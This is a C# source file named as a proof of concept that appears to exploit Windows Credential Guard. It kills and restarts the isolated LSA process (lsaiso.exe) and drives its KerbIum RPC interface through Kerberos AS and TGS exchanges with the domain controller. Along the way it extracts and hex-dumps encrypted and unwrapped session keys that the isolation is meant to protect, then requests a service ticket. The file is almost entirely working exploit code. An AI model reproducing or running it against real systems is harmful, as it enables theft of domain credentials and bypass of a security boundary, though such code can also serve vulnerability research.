﻿using KerbIumRpc;
using NtApiDotNet;
using NtApiDotNet.Ndr.Marshal;
using NtApiDotNet.Utilities.ASN1.Builder;
using NtApiDotNet.Utilities.Text;
using NtApiDotNet.Win32.Security.Authentication.Kerberos;
using NtApiDotNet.Win32.Security.Authentication.Kerberos.Builder;
using NtApiDotNet.Win32.Security.Authentication.Kerberos.Client;
using System;
using System.Collections.Generic;
using System.Linq;

namespace poc
{
    internal static class Program
    {
        static void StopLsaIso()
        {
            using (var processes = NtProcess.GetProcesses(ProcessAccessRights.AllAccess).ToDisposableList())
            {
                foreach (var process in processes)
                {
                    if (process.Name.Equals("lsaiso.exe", StringComparison.OrdinalIgnoreCase) && !process.IsDeleting)
                    {
                        Console.WriteLine("Terminating LSAISO at PID {0}", process.ProcessId);
                        process.BreakOnTermination = false;
                        process.Terminate(0);
                        process.Wait();
                    }
                }
            }
        }

        static NtProcessCreateResult RestartLsaIso()
        {
            NtToken.EnableDebugPrivilege();
            StopLsaIso();

            string path = $@"{Environment.GetFolderPath(Environment.SpecialFolder.System)}\lsaiso.exe";
            Console.WriteLine(path);
            NtProcessCreateConfig config = new NtProcessCreateConfig
            {
                ImagePath = $@"\??\{path}",
                CommandLine = "lsaiso -CredGuard",
                Secure = true
            };
            return NtProcess.Create(config);
        }

        internal static void CheckResult(this int result)
        {
            if (result < 0)
                throw new NtException((NtStatus)result);
        }

        static Client Connect(out NdrContextHandle handle)
        {
            Client c = new Client();
            c.Connect("LSA_ISO_RPC_SERVER");
            c.KerbIumGetClientContext(out handle).CheckResult();
            return c;
        }

        internal static string ToHexDump(this byte[] ba)
        {
            HexDumpBuilder builder = new HexDumpBuilder(true, true, true, true, 0);
            builder.Append(ba);
            builder.Complete();
            return builder.ToString();
        }

        static string GetDomainController()
        {
            return Environment.GetEnvironmentVariable("LOGONSERVER")?.TrimStart('\\') 
                ?? throw new ArgumentException("Can't find logon server.");
        }

        private static KERB_ENCRYPTION_KEY GetKey(IEnumerable<KERB_ENCRYPTION_KEY> keys, KerberosEncryptionType type)
        {
            return keys.Where(k => k.EncryptionType == (int)type).First();
        }

        public static KERB_ENCRYPTION_KEY[] BuildKeys(Client c, NdrContextHandle handle, string username, string realm, string password)
        {
            KerbSharedConfiguration config = new KerbSharedConfiguration(4096, 4096, 4096, 4096, 4096);
            c.KerbIumUpdateSharedConfiguration(handle, config, out config).CheckResult();

            KERB_PASSWORD_OR_BLOB pwd = new KERB_PASSWORD_OR_BLOB(IntPtr.Zero, 0, 
                new KERB_PASSWORD_OR_BLOB_UNION(0, default, new UNICODE_STRING(password)));
            c.KerbIumBuildPasswordList(handle, pwd, new UNICODE_STRING("ABC"),
                new UNICODE_STRING(realm.ToUpper()), null, null, new UNICODE_STRING(username), 0, 1, 0, 
                out KERB_STORED_CREDENTIAL? cred).CheckResult();
            return cred?.UserKeys.Select(v => v.Key).ToArray() ?? new KERB_ENCRYPTION_KEY[0];
        }

        public static KERB_ENCRYPTION_KEY UnwrapKey(this KerberosAuthenticationKey key)
        {
            byte[] key_bytes = (byte[])key.Key.Clone();
            if (key.KeyEncryption != KerberosEncryptionType.WRAPPED_KEY)
                return new KERB_ENCRYPTION_KEY(IntPtr.Zero, 0, (int)key.KeyEncryption, new CryptoBlob(key_bytes.Length, key_bytes));
            if (key_bytes.Length < 12)
                throw new ArgumentException("Invalid wrapped key size.");
            if (BitConverter.ToUInt32(key_bytes, 0) != 0x50415257)
                throw new ArgumentException("Invalid wrapped key magic.");
            byte[] new_key_bytes = new byte[key_bytes.Length - 12];
            Buffer.BlockCopy(key_bytes, 12, new_key_bytes, 0, new_key_bytes.Length);
            return new KERB_ENCRYPTION_KEY(IntPtr.Zero, BitConverter.ToInt32(key_bytes, 4),
                BitConverter.ToInt32(key_bytes, 8), new CryptoBlob(new_key_bytes.Length, new_key_bytes));
        }

        private static KERB_RPC_INTERNAL_NAME ToRpcName(this KerberosPrincipalName name)
        {
            return new KERB_RPC_INTERNAL_NAME((short)name.NameType, (short)name.Names.Count(),
                name.Names.Select(n => new UNICODE_STRING(n)).ToArray());
        }

        private static KERB_ADJUSTED_TIME GetTime()
        {
            return new KERB_ADJUSTED_TIME(0, DateTime.Now.ToFileTimeUtc(), 0);
        }

        private static KERB_ASN1_DATA ToAsn1Data(this IDERObject obj, int pdu)
        {
            DERBuilder builder = new DERBuilder();
            builder.WriteObject(obj);
            byte[] ba = builder.ToArray();
            return new KERB_ASN1_DATA(pdu, ba.Length, ba);
        }

        static void RequestTicket(KerberosCredential tgt, string dc)
        {
            KerberosKDCClient client = KerberosKDCClient.CreateTCPClient(dc);
            var ticket_cache = new KerberosLocalTicketCache(tgt, client);
            var ticket = ticket_cache.GetTicket(new KerberosPrincipalName(KerberosNameType.SRV_INST, Environment.MachineName));
            Console.WriteLine(ticket.Ticket.Format());
        }

        static void RunExploit(string username, string realm, string old_password)
        {
            string dc = GetDomainController();
            Console.WriteLine("Using DC {0}", dc);

            Client c = Connect(out NdrContextHandle handle);
            var keys = BuildKeys(c, handle, username, realm.ToUpper(), old_password);
            KERB_ENCRYPTION_KEY key = GetKey(keys, KerberosEncryptionType.AES256_CTS_HMAC_SHA1_96);

            Console.WriteLine("Encrypted Key:");
            Console.WriteLine(key.Key.Data.GetValue().ToHexDump());

            KERB_ADJUSTED_TIME time = new KERB_ADJUSTED_TIME(0, DateTime.Now.ToFileTimeUtc(), 0);
            c.KerbIumBuildAsReqAuthenticator(handle, key, null, time, out int _, out CryptoBlob timestamp).CheckResult();
            KerberosKDCClientTransportTCP kdc = new KerberosKDCClientTransportTCP(dc, 88);
            KerberosASRequestBuilder as_req = new KerberosASRequestBuilder
            {
                KDCOptions = KerberosKDCOptions.Forwardable | KerberosKDCOptions.Canonicalize | KerberosKDCOptions.Renewable,
                Realm = realm.ToUpper(),
                ClientName = new KerberosPrincipalName(KerberosNameType.PRINCIPAL, username),
                ServerName = new KerberosPrincipalName(KerberosNameType.SRV_INST, $"krbtgt/{realm.ToUpper()}"),
                Nonce = 1,
                TillTime = KerberosTime.MaximumTime,
                EncryptionTypes = new List<KerberosEncryptionType>() { KerberosEncryptionType.AES256_CTS_HMAC_SHA1_96 }
            };
            as_req.AddPreAuthenticationData(new KerberosPreAuthenticationDataUnknown(
                KerberosPreAuthenticationType.PA_ENC_TIMESTAMP, timestamp.Data));

            var res = kdc.SendReceive(as_req.Create().ToArray());

            var reply = KerberosKDCReplyAuthenticationToken.Parse(res);

            DERBuilder der_builder = new DERBuilder();
            der_builder.WriteObject(reply.EncryptedData);
            byte[] enc_data = der_builder.ToArray();

            KERB_ASN1_DATA asn1_data = new KERB_ASN1_DATA(6, enc_data.Length, enc_data);

            c.KerbIumUnpackKdcReplyBody(handle, asn1_data, key, null, 69, 3,
                out int _, out KERB_ENCRYPTION_KEY[] _, out int error, out asn1_data).CheckResult();
            if (error != 0)
                throw new Exception($"Error {error}");

            var enc_part = KerberosKDCReplyEncryptedPart.Parse(asn1_data.Data);
            KerberosASReply as_reply = new KerberosASReply(reply, enc_part);
            KERB_ENCRYPTION_KEY unwrapped_key = as_reply.ReplyData.Key.UnwrapKey();

            var request = KerberosTGSRequest.CreateForRenewal(as_reply.ToCredential());

            var subkey = KerberosAuthenticationKey.GenerateKey((KerberosEncryptionType)unwrapped_key.EncryptionType);
            var tgs_req = request.ToBuilder();

            Console.WriteLine("Encrypted Session Key:");
            Console.WriteLine(unwrapped_key.Key.Data.GetValue().ToHexDump());

            var checksum = KerberosChecksum.Create(KerberosChecksumType.RSA_MD5, tgs_req.EncodeBody());
            c.KerbIumCreateApReqAuthenticator(handle, unwrapped_key, new Random().Next(), request.ClientName.ToRpcName(),
                new UNICODE_STRING(request.ClientRealm), GetTime(), subkey.UnwrapKey(), null, checksum.ToAsn1Data(8),
                7, out LARGE_INT_RPC _, out KERB_ASN1_DATA auth, out int proto_error).CheckResult();

            tgs_req.AddPreAuthenticationData(new KerberosPreAuthenticationDataTGSRequest(0, request.Ticket,
                KerberosEncryptedData.Parse(auth.Data.GetValue())));

            reply = KerberosKDCReplyAuthenticationToken.Parse(kdc.SendReceive(tgs_req.Create().ToArray()));
            var reply_dec = reply.EncryptedData.Decrypt(subkey, KerberosKeyUsage.TgsRepEncryptedPartAuthSubkey);
            enc_part = KerberosKDCReplyEncryptedPart.Parse(reply_dec.CipherText);

            var tgs_reply = new KerberosTGSReply(reply, enc_part);
            Console.WriteLine("Final Session Key:");
            Console.WriteLine(tgs_reply.SessionKey.Key.ToHexDump());

            RequestTicket(tgs_reply.ToCredential(), dc);
        }

        static void Main(string[] args)
        {
            try
            {
                if (args.Length < 3)
                    throw new ArgumentException("Specify username realm password.");

                using (var lsaiso = RestartLsaIso())
                {
                    lsaiso.Process.Wait(2);
                    if (lsaiso.Process.ExitNtStatus != NtStatus.STATUS_PENDING)
                        throw new Exception("Couldn't start lsaiso");
                }

                RunExploit(args[0], args[1], args[2]);
            }
            catch (Exception ex)
            {
                Console.WriteLine(ex);
            }
        }
    }
}
